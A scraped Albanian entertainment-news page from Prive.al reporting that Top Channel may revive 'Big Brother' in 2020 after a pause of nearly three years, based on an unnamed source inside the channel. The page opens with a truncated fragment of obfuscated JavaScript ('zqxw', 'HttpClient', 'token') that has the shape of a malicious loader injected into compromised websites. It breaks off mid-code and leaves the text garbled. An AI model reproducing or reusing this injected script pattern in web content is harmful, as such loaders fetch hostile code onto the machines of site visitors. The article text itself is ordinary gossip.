;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas gati tre vitesh ‘Big Brother’ rikthehet këtë sezon televiziv?

By

Që prej Janarit të vitit 2018 përflitet për rikthimin e reality-show ‘Big Brother’, këtë herë në formatin me VIP.

Ishte një promo në Top Channel ajo që bëri fansat të mendojnë se nisja e spektaklit do të ndodhë shpejt. Sidoqoftë, një vit e gjysmë pas një gjë e tillë nuk ndodhi.

Fakti se Big-u mungoi përgjatë 2018-tës dhe 2019-tës për shkak të pamundësisë financiare nga kosto e lartë nuk nënkupton se televizioni shqiptar nuk ka hequr dorë nga ky format. Në fakt, po bëhen përpjekje që ai të rikthehet.

Prive.al ka arritur të mësojë se sipas të gjitha gjasave, ‘Big Brother’ do të ketë në këtë sezon televiziv pas një pauze gati tre vjeçare.

‘Top Channel po i shqyrton mundësitë që ta rikthejë ‘Big Brother’-in dhe shanset janë më të mëdha këtë vit marrë shkas edhe nga investimet e kryera që e lehtësojnë organizimin ndryshe nga vjet kur nuk kishte asgjë gati. Në studion e re të televizionit, Nova, e cila ka një hapësirë prej rreth 2000 metrave katrorë aktualisht po finalizohet shtëpia për ‘Hell’s Kitchen’ që nis në muajin Tetor dhe përfundon në Janar. Planet janë që po e njejta shtëpi të modifikohet përgjatë periudhës Janar-Shkurt dhe tek ajo të realizohet edicioni i ri i Big-ut nga pjesa e dytë e muajit Mars deri në fund të Qershorit 2020, gjithmonë nëse gjërat nuk dështojnë rrugës.’ – ka thënë ky burim brenda televizionit.

Detajet e tjera priten të bëhen të ditura nga Shtatori e tutje kur edhe idetë do të kristalizohen dhe do të definohet nëse ekzistojnë kapacitetet e nevojshme për këtë sipërmarrje të madhe televizive teksa mbetet poashtu të kuptojmë nëse formati do të vijë me njerëz të rëndomtë apo me VIP-a sepse edhe ky detaj vazhdon ende të jetë diskutabil. /Prive.al

Artikuj të ngjashëm